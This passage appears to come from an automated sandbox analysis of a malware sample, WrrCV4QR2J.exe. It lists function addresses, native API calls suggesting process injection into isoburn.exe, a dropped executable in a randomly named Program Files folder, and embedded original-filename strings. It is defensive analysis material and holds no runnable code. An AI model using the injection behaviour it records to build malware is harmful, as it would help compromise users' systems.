            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D39B0 NtGetContextThread,LdrInitializeThunk,4_2_049D39B0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2CC0 NtQueryVirtualMemory,4_2_049D2CC0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2CF0 NtOpenProcess,4_2_049D2CF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2C00 NtQueryInformationProcess,4_2_049D2C00
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2DB0 NtEnumerateKey,4_2_049D2DB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2D00 NtSetInformationFile,4_2_049D2D00
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2EA0 NtAdjustPrivilegesToken,4_2_049D2EA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2E30 NtWriteVirtualMemory,4_2_049D2E30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2F90 NtProtectVirtualMemory,4_2_049D2F90
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2FA0 NtQuerySection,4_2_049D2FA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2F60 NtCreateProcessEx,4_2_049D2F60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2AB0 NtWaitForSingleObject,4_2_049D2AB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2B80 NtQueryInformationFile,4_2_049D2B80
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D3090 NtSetValueKey,4_2_049D3090
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D3010 NtOpenDirectoryObject,4_2_049D3010
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D3D10 NtOpenProcessToken,4_2_049D3D10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D3D70 NtOpenThread,4_2_049D3D70
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_028F4F10 NtCreateFile,4_2_028F4F10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_028F52C0 NtAllocateVirtualMemory,4_2_028F52C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_028F5040 NtReadFile,4_2_028F5040
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_028F5180 NtClose,4_2_028F5180
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_028F5100 NtDeleteFile,4_2_028F5100
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 0_2_02DB11780_2_02DB1178
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 0_2_02DB1D600_2_02DB1D60
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 0_2_02DB21C80_2_02DB21C8
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 0_2_02DB21B70_2_02DB21B7
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 0_2_02DB11680_2_02DB1168
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 0_2_02DB0BC80_2_02DB0BC8
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 0_2_02DB0BB90_2_02DB0BB9
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 0_2_02DB1D500_2_02DB1D50
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 0_2_02E3E72C0_2_02E3E72C
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 0_2_02E374480_2_02E37448
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_004010002_2_00401000
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0040280B2_2_0040280B
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_004028102_2_00402810
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0040112B2_2_0040112B
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_004011302_2_00401130
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_004101332_2_00410133
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0040E1B32_2_0040E1B3
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_004012802_2_00401280
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_00402BC92_2_00402BC9
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_00402C402_2_00402C40
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_004164432_2_00416443
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_00402C3D2_2_00402C3D
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0041643E2_2_0041643E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_004025202_2_00402520
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0040FF0A2_2_0040FF0A
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0040FF132_2_0040FF13
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_00402FC02_2_00402FC0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0042A7E32_2_0042A7E3
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016081582_2_01608158
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015701002_2_01570100
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161A1182_2_0161A118
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016381CC2_2_016381CC
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016401AA2_2_016401AA
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016120002_2_01612000
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0163A3522_2_0163A352
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016403E62_2_016403E6
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0158E3F02_2_0158E3F0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016202742_2_01620274
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016002C02_2_016002C0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015805352_2_01580535
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016405912_2_01640591
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016324462_2_01632446
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0162E4F62_2_0162E4F6
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A47502_2_015A4750
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015807702_2_01580770
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157C7C02_2_0157C7C0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159C6E02_2_0159C6E0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015969622_2_01596962
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0164A9A62_2_0164A9A6
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015829A02_2_015829A0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0158A8402_2_0158A840
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015828402_2_01582840
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AE8F02_2_015AE8F0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015668B82_2_015668B8
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0163AB402_2_0163AB40
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01636BD72_2_01636BD7
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157EA802_2_0157EA80
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0158AD002_2_0158AD00
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161CD1F2_2_0161CD1F
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157ADE02_2_0157ADE0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01598DBF2_2_01598DBF
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580C002_2_01580C00
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01570CF22_2_01570CF2
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01620CB52_2_01620CB5
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F4F402_2_015F4F40
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01622F302_2_01622F30
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A0F302_2_015A0F30
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015C2F282_2_015C2F28
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01572FC82_2_01572FC8
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015FEFA02_2_015FEFA0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580E592_2_01580E59
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0163EE262_2_0163EE26
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0163EEDB2_2_0163EEDB
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01592E902_2_01592E90
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0163CE932_2_0163CE93
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0164B16B2_2_0164B16B
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156F1722_2_0156F172
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B516C2_2_015B516C
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0158B1B02_2_0158B1B0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0163F0E02_2_0163F0E0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016370E92_2_016370E9
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015870C02_2_015870C0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0162F0CC2_2_0162F0CC
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156D34C2_2_0156D34C
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0163132D2_2_0163132D
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015C739A2_2_015C739A
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016212ED2_2_016212ED
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159B2C02_2_0159B2C0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159D2F02_2_0159D2F0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015852A02_2_015852A0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016375712_2_01637571
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161D5B02_2_0161D5B0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015714602_2_01571460
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0163F43F2_2_0163F43F
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0163F7B02_2_0163F7B0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016316CC2_2_016316CC
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015899502_2_01589950
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159B9502_2_0159B950
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016159102_2_01615910
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015ED8002_2_015ED800
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015838E02_2_015838E0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0163FB762_2_0163FB76
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015BDBF92_2_015BDBF9
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F5BF02_2_015F5BF0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159FB802_2_0159FB80
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01637A462_2_01637A46
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0163FA492_2_0163FA49
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F3A6C2_2_015F3A6C
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0162DAC62_2_0162DAC6
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01621AA32_2_01621AA3
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161DAAC2_2_0161DAAC
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015C5AA02_2_015C5AA0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01637D732_2_01637D73
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01583D402_2_01583D40
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01631D5A2_2_01631D5A
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159FDC02_2_0159FDC0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F9C322_2_015F9C32
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0163FCF22_2_0163FCF2
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0163FF092_2_0163FF09
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01581F922_2_01581F92
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0163FFB12_2_0163FFB1
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01589EB02_2_01589EB0
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exeCode function: 3_2_050123783_2_05012378
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exeCode function: 3_2_0501A65D3_2_0501A65D
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exeCode function: 3_2_0501A6623_2_0501A662
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exeCode function: 3_2_050141293_2_05014129
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exeCode function: 3_2_050141323_2_05014132
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exeCode function: 3_2_050143523_2_05014352
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exeCode function: 3_2_050123D23_2_050123D2
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exeCode function: 3_2_0502EA023_2_0502EA02
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A4E4F64_2_04A4E4F6
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A444204_2_04A44420
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A524464_2_04A52446
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A605914_2_04A60591
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049A05354_2_049A0535
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049BC6E04_2_049BC6E0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_0499C7C04_2_0499C7C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049C47504_2_049C4750
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049A07704_2_049A0770
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A320004_2_04A32000
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A541A24_2_04A541A2
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A601AA4_2_04A601AA
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A581CC4_2_04A581CC
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049901004_2_04990100
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A3A1184_2_04A3A118
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A281584_2_04A28158
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A202C04_2_04A202C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A402744_2_04A40274
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A603E64_2_04A603E6
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049AE3F04_2_049AE3F0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A5A3524_2_04A5A352
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A40CB54_2_04A40CB5
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04990CF24_2_04990CF2
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049A0C004_2_049A0C00
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049B8DBF4_2_049B8DBF
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_0499ADE04_2_0499ADE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049AAD004_2_049AAD00
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A3CD1F4_2_04A3CD1F
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049B2E904_2_049B2E90
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A5CE934_2_04A5CE93
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A5EEDB4_2_04A5EEDB
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A5EE264_2_04A5EE26
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049A0E594_2_049A0E59
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A1EFA04_2_04A1EFA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04992FC84_2_04992FC8
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A42F304_2_04A42F30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049C0F304_2_049C0F30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049E2F284_2_049E2F28
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A14F404_2_04A14F40
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049868B84_2_049868B8
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049CE8F04_2_049CE8F0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049A28404_2_049A2840
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049AA8404_2_049AA840
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A6A9A64_2_04A6A9A6
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049A29A04_2_049A29A0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049B69624_2_049B6962
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_0499EA804_2_0499EA80
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A56BD74_2_04A56BD7
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A5AB404_2_04A5AB40
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A5F43F4_2_04A5F43F
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049914604_2_04991460
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A3D5B04_2_04A3D5B0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A695C34_2_04A695C3
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A575714_2_04A57571
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A516CC4_2_04A516CC
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049E56304_2_049E5630
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A5F7B04_2_04A5F7B0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A5F0E04_2_04A5F0E0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A570E94_2_04A570E9
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049A70C04_2_049A70C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A4F0CC4_2_04A4F0CC
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A6B16B4_2_04A6B16B
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_0498F1724_2_0498F172
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D516C4_2_049D516C
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049A52A04_2_049A52A0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A412ED4_2_04A412ED
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049BB2C04_2_049BB2C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049BD2F04_2_049BD2F0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049E739A4_2_049E739A
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A5132D4_2_04A5132D
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_0498D34C4_2_0498D34C
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A5FCF24_2_04A5FCF2
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A19C324_2_04A19C32
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049BFDC04_2_049BFDC0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A57D734_2_04A57D73
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049A3D404_2_049A3D40
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A51D5A4_2_04A51D5A
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049A9EB04_2_049A9EB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049A1F924_2_049A1F92
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A5FFB14_2_04A5FFB1
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04963FD54_2_04963FD5
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04963FD24_2_04963FD2
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A5FF094_2_04A5FF09
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049A38E04_2_049A38E0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A0D8004_2_04A0D800
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A359104_2_04A35910
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049A99504_2_049A9950
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049BB9504_2_049BB950
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A41AA34_2_04A41AA3
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A3DAAC4_2_04A3DAAC
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049E5AA04_2_049E5AA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A4DAC64_2_04A4DAC6
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A13A6C4_2_04A13A6C
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A57A464_2_04A57A46
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A5FA494_2_04A5FA49
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049BFB804_2_049BFB80
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A15BF04_2_04A15BF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049DDBF94_2_049DDBF9
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A5FB764_2_04A5FB76
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_028E1A104_2_028E1A10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_028DAEE04_2_028DAEE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_028DCE604_2_028DCE60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_028DCC374_2_028DCC37
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_028DCC404_2_028DCC40
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_028E316B4_2_028E316B
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_028E31704_2_028E3170
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_028F75104_2_028F7510
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: String function: 015EEA12 appears 86 times
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: String function: 015B5130 appears 58 times
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: String function: 0156B970 appears 257 times
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: String function: 015C7E54 appears 99 times
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: String function: 015FF290 appears 103 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 049E7E54 appears 107 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 04A1F290 appears 103 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 0498B970 appears 262 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 049D5130 appears 58 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 04A0EA12 appears 86 times
            Source: WrrCV4QR2J.exe, 00000000.00000002.1688006226.0000000007F10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs WrrCV4QR2J.exe
            Source: WrrCV4QR2J.exe, 00000000.00000002.1683349933.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs WrrCV4QR2J.exe
            Source: WrrCV4QR2J.exe, 00000000.00000000.1664181209.0000000000A62000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameTUvN.exeT vs WrrCV4QR2J.exe
            Source: WrrCV4QR2J.exe, 00000002.00000002.1791940779.0000000001017000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameISOBURN.EXEj% vs WrrCV4QR2J.exe
            Source: WrrCV4QR2J.exe, 00000002.00000002.1792171632.000000000166D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs WrrCV4QR2J.exe
            Source: WrrCV4QR2J.exeBinary or memory string: OriginalFilenameTUvN.exeT vs WrrCV4QR2J.exe
            Source: WrrCV4QR2J.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
